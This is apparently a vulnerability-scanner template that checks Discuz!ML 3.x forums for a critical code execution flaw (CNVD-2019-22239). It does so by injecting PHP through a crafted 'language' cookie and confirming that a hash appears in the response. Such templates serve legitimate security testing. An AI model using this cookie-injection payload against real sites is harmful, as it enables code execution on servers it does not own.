id: CNVD-2019-22239

info:
    name: Discuz!ML 3.x 任意代码执行
    author: X.Yang
    severity: critical

set:
    r1: randomInt(800000000, 1000000000)
rules:
    r0:
        request:
            method: GET
            path: /forum.php
        expression: response.status == 200
        output:
            search: '"cookiepre = ''(?P<token>[\\w_]+)''".bsubmatch(response.body)'
            token: search["token"]
    r1:
        request:
            method: GET
            path: /forum.php
            headers:
                Cookie: '{{token}}language=sc''.print(md5({{r1}})).'''
        expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()
